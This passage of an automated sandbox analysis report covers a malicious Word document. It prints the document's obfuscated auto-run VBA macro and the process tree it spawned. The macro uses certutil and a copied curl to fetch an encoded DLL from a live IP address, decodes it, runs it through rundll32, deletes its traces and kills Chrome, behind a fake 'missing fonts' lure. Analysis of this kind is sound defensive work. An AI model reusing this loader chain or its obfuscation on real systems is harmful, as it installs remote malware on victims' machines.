                              MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:26
                              Start time:09:58:33
                              Start date:22/07/2024
                              Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
                              Imagebase:0x740000
                              File size:1'620'872 bytes
                              MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:false

                              Target ID:28
                              Start time:09:58:42
                              Start date:22/07/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
                              Imagebase:0x1c0000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:29
                              Start time:09:58:42
                              Start date:22/07/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:30
                              Start time:09:58:42
                              Start date:22/07/2024
                              Path:C:\Windows\SysWOW64\xcopy.exe
                              Wow64 process (32bit):true
                              Commandline:xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
                              Imagebase:0x430000
                              File size:43'520 bytes
                              MD5 hash:7E9B7CE496D09F70C072930940F9F02C
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:31
                              Start time:09:58:42
                              Start date:22/07/2024
                              Path:C:\Windows\SysWOW64\certutil.exe
                              Wow64 process (32bit):true
                              Commandline:certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
                              Imagebase:0x340000
                              File size:1'277'440 bytes
                              MD5 hash:0DDA4F16AE041578B4E250AE12E06EB1
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:32
                              Start time:09:58:43
                              Start date:22/07/2024
                              Path:C:\Windows\SysWOW64\certutil.exe
                              Wow64 process (32bit):true
                              Commandline:certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
                              Imagebase:0x340000
                              File size:1'277'440 bytes
                              MD5 hash:0DDA4F16AE041578B4E250AE12E06EB1
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:33
                              Start time:09:58:43
                              Start date:22/07/2024
                              Path:C:\Users\user\AppData\Local\Temp\curl.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
                              Imagebase:0x830000
                              File size:470'528 bytes
                              MD5 hash:44E5BAEEE864F1E9EDBE3986246AB37A
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:34
                              Start time:09:58:46
                              Start date:22/07/2024
                              Path:C:\Windows\SysWOW64\certutil.exe
                              Wow64 process (32bit):true
                              Commandline:certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
                              Imagebase:0x340000
                              File size:1'277'440 bytes
                              MD5 hash:0DDA4F16AE041578B4E250AE12E06EB1
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:35
                              Start time:09:58:47
                              Start date:22/07/2024
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
                              Imagebase:0xfc0000
                              File size:61'440 bytes
                              MD5 hash:889B99C52A60DD49227C5E485A016679
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:36
                              Start time:09:58:47
                              Start date:22/07/2024
                              Path:C:\Windows\System32\rundll32.exe
                              Wow64 process (32bit):false
                              Commandline:rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
                              Imagebase:0x7ff7868b0000
                              File size:71'680 bytes
                              MD5 hash:EF3179D498793BF4234F708D3BE28633
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:37
                              Start time:09:58:47
                              Start date:22/07/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
                              Imagebase:0x7ff7a6040000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:38
                              Start time:09:58:47
                              Start date:22/07/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff66e660000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:39
                              Start time:09:58:47
                              Start date:22/07/2024
                              Path:C:\Windows\System32\taskkill.exe
                              Wow64 process (32bit):false
                              Commandline:taskkill /F /IM chrome.exe
                              Imagebase:0x7ff6956e0000
                              File size:101'376 bytes
                              MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Call Graph

                              Module: ThisDocument

                              Declaration
                              LineContent
                              1

                              Attribute VB_Name = "ThisDocument"

                              2

                              Attribute VB_Base = "1Normal.ThisDocument"

                              3

                              Attribute VB_GlobalNameSpace = False

                              4

                              Attribute VB_Creatable = False

                              5

                              Attribute VB_PredeclaredId = True

                              6

                              Attribute VB_Exposed = True

                              7

                              Attribute VB_TemplateDerived = True

                              8

                              Attribute VB_Customizable = True

                              APIsMeta Information

                              Path

                              ActiveDocument

                              Environ

                              Environ("temp") -> C:\Users\engineer\AppData\Local\Temp

                              Chr

                              CreateObject

                              CreateObject("WScript.Shell")

                              Run

                              IWshShell3.Run("C:\Windows\System32\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\engineer\AppData\Local\Temp & certutil -f -encode C:\Users\engineer\AppData\Local\Temp\curl.exe C:\Users\engineer\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\engineer\AppData\Local\Temp\curl.txt C:\Users\engineer\AppData\Local\Temp\curl.exe & C:\Users\engineer\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\engineer\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\engineer\AppData\Local\Temp\mscorsvc.txt C:\Users\engineer\AppData\Local\Temp\mscorsvc.dll & del C:\Users\engineer\AppData\Local\Temp\curl.exe & del C:\Users\engineer\AppData\Local\Temp\curl.txt & del C:\Users\engineer\AppData\Local\Temp\curl.exe & del C:\Users\engineer\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\engineer\AppData\Local\Temp\mscorsvc.dll,DllMain & exit",0,False) -> 0
                              StringsDecrypted Strings
                              "temp"
                              "http://172.104.160.126:8099"
                              """
                              "WScript.Shell"
                              LineInstructionMeta Information
                              136

                              Sub MainFunc()

                              137

                              Dim curl_enc_txt_path as String

                              executed
                              138

                              Dim curl_dec_exe_path as String

                              139

                              Dim mal_enc_txt_url as String

                              140

                              Dim mal_enc_txt_path as String

                              141

                              Dim mal_dec_exe_path as String

                              142

                              Dim pp as String

                              143

                              Dim cc as String

                              144

                              Dim dir as String

                              145

                              Dim host as String

                              147

                              dir = ActiveDocument.Path

                              Path

                              ActiveDocument

                              148

                              dir = Environ("temp")

                              Environ("temp") -> C:\Users\engineer\AppData\Local\Temp

                              executed
                              149

                              host = "http://172.104.160.126:8099"

                              150

                              curl_enc_txt_path = dir + "\curl.txt"

                              151

                              curl_dec_exe_path = dir + "\curl.exe"

                              153

                              mal_enc_txt_url = host + "/payload2.txt"

                              154

                              mal_enc_txt_path = dir + "\mscorsvc.txt"

                              155

                              mal_dec_exe_path = dir + "\mscorsvc.dll"

                              157

                              pp = pp + "C:\Windows\Sys"

                              158

                              pp = pp + "tem32\cmd.exe /c "

                              159

                              cc = cc + curl_enc_txt_path + curl_dec_exe_path

                              160

                              pp = pp + "xcopy C:\Windows\Sys"

                              161

                              cc = cc + curl_enc_txt_path + mal_enc_txt_url

                              162

                              pp = pp + "tem32\cu" + "rl.exe " + dir + " & "

                              163

                              cc = cc + mal_enc_txt_path + mal_enc_txt_url

                              164

                              pp = pp + "certutil -f "

                              165

                              cc = cc + mal_enc_txt_path + mal_dec_exe_path

                              166

                              pp = pp + "-encode " + dir + "\cu" + "rl.exe " + curl_enc_txt_path + " & "

                              167

                              cc = cc + pp + mal_dec_exe_path

                              168

                              pp = pp + "certutil -f "

                              169

                              cc = cc + pp + dir

                              170

                              pp = pp + "-decode " + curl_enc_txt_path + " " + curl_dec_exe_path + " & "

                              171

                              cc = cc + curl_enc_txt_path + dir

                              173

                              pp = pp + curl_dec_exe_path + " " + mal_enc_txt_url + " -o " + mal_enc_txt_path + " & "

                              174

                              cc = cc + curl_enc_txt_path + dir

                              175

                              pp = pp + "certutil -f "

                              176

                              cc = cc + curl_enc_txt_path + curl_dec_exe_path

                              177

                              pp = pp + "-decode " + mal_enc_txt_path + " " + mal_dec_exe_path + " & "

                              178

                              cc = cc + mal_enc_txt_url + curl_dec_exe_path

                              180

                              pp = pp + "del " + dir + "\cu" + "rl.exe & "

                              181

                              cc = cc + host + pp + curl_enc_txt_path

                              182

                              pp = pp + "del " + curl_enc_txt_path + " & "

                              183

                              cc = cc + curl_enc_txt_path + dir

                              184

                              pp = pp + "del " + curl_dec_exe_path + " & "

                              185

                              cc = cc + curl_dec_exe_path + pp

                              187

                              pp = pp + "del " + mal_enc_txt_path + " & "

                              188

                              cc = cc + mal_enc_txt_path + pp

                              190

                              Dim vbDblQuote as String

                              191

                              vbDblQuote = Chr(34)

                              Chr

                              192

                              pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "

                              193

                              cc = cc + mal_dec_exe_path + pp

                              195

                              pp = pp + "exit"

                              196

                              cc = cc + dir + pp

                              201

                              Dim objShell as Object

                              202

                              Set objShell = CreateObject("WScript.Shell")

                              CreateObject("WScript.Shell")

                              executed
                              203

                              objShell.Run pp, 0, False

                              IWshShell3.Run("C:\Windows\System32\cmd.exe /c xcopy C:\Windows\System32\curl.exe C:\Users\engineer\AppData\Local\Temp & certutil -f -encode C:\Users\engineer\AppData\Local\Temp\curl.exe C:\Users\engineer\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\engineer\AppData\Local\Temp\curl.txt C:\Users\engineer\AppData\Local\Temp\curl.exe & C:\Users\engineer\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\engineer\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\engineer\AppData\Local\Temp\mscorsvc.txt C:\Users\engineer\AppData\Local\Temp\mscorsvc.dll & del C:\Users\engineer\AppData\Local\Temp\curl.exe & del C:\Users\engineer\AppData\Local\Temp\curl.txt & del C:\Users\engineer\AppData\Local\Temp\curl.exe & del C:\Users\engineer\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\engineer\AppData\Local\Temp\mscorsvc.dll,DllMain & exit",0,False) -> 0

                              executed
                              204

                              End Sub

                              APIsMeta Information

                              Part of subcall function MainFunc@ThisDocument: Path

                              Part of subcall function MainFunc@ThisDocument: ActiveDocument

                              Part of subcall function MainFunc@ThisDocument: Environ

                              Part of subcall function MainFunc@ThisDocument: Chr

                              Part of subcall function MainFunc@ThisDocument: CreateObject

                              Part of subcall function MainFunc@ThisDocument: Run

                              LineInstructionMeta Information
                              207

                              Sub Document_Open()

                              208

                              MainFunc

                              executed
                              209

                              End Sub

                              APIsMeta Information

                              vbYesNo

                              vbCritical

                              vbDefaultButton2

                              MsgBox

                              vbYes

                              Part of subcall function DeleteText@ThisDocument: Paragraphs

                              Part of subcall function DeleteText@ThisDocument: Chr

                              Part of subcall function DeleteText@ThisDocument: Paragraphs

                              Part of subcall function DeleteText@ThisDocument: Paragraphs

                              Part of subcall function DeleteText@ThisDocument: Paragraphs

                              Part of subcall function DeleteText@ThisDocument: Paragraphs

                              Part of subcall function DeleteText@ThisDocument: ActiveDocument

                              Part of subcall function DeleteText@ThisDocument: Paragraphs

                              StringsDecrypted Strings
                              "The document cannot be fully displayed due to missing fonts. Do you want to install missing fonts?"
                              "Missing font"
                              "DEMO.HLP"
                              "Yes"
                              "Yes"
                              "No"
                              LineInstructionMeta Information
                              118

                              Sub MsgFunc()

                              119

                              Dim Msg, Style, Title, Help, Ctxt, Response, MyString

                              120

                              Msg = "The document cannot be fully displayed due to missing fonts. Do you want to install missing fonts?"

                              121

                              Style = vbYesNo Or vbCritical Or vbDefaultButton2

                              vbYesNo

                              vbCritical

                              vbDefaultButton2

                              122

                              Title = "Missing font"

                              123

                              Help = "DEMO.HLP"

                              124

                              Ctxt = 1000

                              126

                              Response = MsgBox(Msg, Style, Title, Help, Ctxt)

                              MsgBox

                              127

                              If Response = vbYes Then

                              vbYes

                              128

                              MyString = "Yes"

                              129

                              DeleteText

                              130

                              Else

                              131

                              MyString = "No"

                              133

                              Endif

                              134

                              End Sub

                              APIsMeta Information

                              Paragraphs

                              Chr

                              Paragraphs

                              Paragraphs

                              Paragraphs

                              Paragraphs

                              ActiveDocument

                              Paragraphs

                              StringsDecrypted Strings
                              "Fourth paragraph displayed ""
                              "Fifth paragraph displayed"
                              "Sixth paragraph displayed"
                              "Seventh paragraph displayed"
                              "Times New Roman"
                              "Times New Roman"
                              LineInstructionMeta Information
                              16

                              Sub DeleteText()

                              26

                              Set rngFirstParagraph = ActiveDocument.Paragraphs(4).Range

                              Paragraphs

                              27

                              With rngFirstParagraph

                              28

                              . Delete

                              29

                              . InsertAfter Text := "Fourth paragraph displayed " + Chr(34)

                              Chr

                              30

                              . InsertParagraphAfter

                              31

                              End With

                              33

                              Set rngFirstParagraph = ActiveDocument.Paragraphs(5).Range

                              Paragraphs

                              34

                              With rngFirstParagraph

                              35

                              . Delete

                              36

                              . InsertAfter Text := "Fifth paragraph displayed"

                              37

                              . InsertParagraphAfter

                              38

                              End With

                              40

                              Set rngFirstParagraph = ActiveDocument.Paragraphs(6).Range

                              Paragraphs

                              41

                              With rngFirstParagraph

                              42

                              . Delete

                              43

                              . InsertAfter Text := "Sixth paragraph displayed"

                              44

                              . InsertParagraphAfter

                              45

                              End With

                              47

                              Set rngFirstParagraph = ActiveDocument.Paragraphs(7).Range

                              Paragraphs

                              48

                              With rngFirstParagraph

                              49

                              . Delete

                              50

                              . InsertAfter Text := "Seventh paragraph displayed"

                              51

                              . InsertParagraphAfter

                              52

                              End With

                              54

                              For i = 1 To ActiveDocument.Paragraphs.Count

                              Paragraphs

                              ActiveDocument

                              56

                              Set myRange = ActiveDocument.Paragraphs(i).Range

                              Paragraphs

                              57

                              With myRange.Font

                              59

                              . Name = "Times New Roman"

                              60

                              . Size = 14

                              61

                              End With

                              62

                              Next i

                              Paragraphs

                              ActiveDocument

                              63

                              End Sub

                              APIsMeta Information

                              Paragraphs

                              ChrW

                              ChrW

                              ChrW

                              ChrW

                              ChrW

                              LineInstructionMeta Information
                              65

                              Sub ShowErrorText()

                              66

                              Dim rngFirstParagraph as Range

                              68

                              Set rngFirstParagraph = ActiveDocument.Paragraphs(4).Range

                              Paragraphs

                              69

                              With rngFirstParagraph

                              70

                              . Delete

                              71

                              . InsertAfter Text := ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3)

                              ChrW

                              76

                              . InsertParagraphAfter

                              78

                              . InsertAfter Text := ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3)

                              ChrW

                              82

                              . InsertParagraphAfter

                              84

                              . InsertAfter Text := ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3)

                              ChrW

                              91

                              . InsertParagraphAfter

                              93

                              . InsertAfter Text := ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 3) + ChrW(- 3) + " " + ChrW(- 3) + ChrW(- 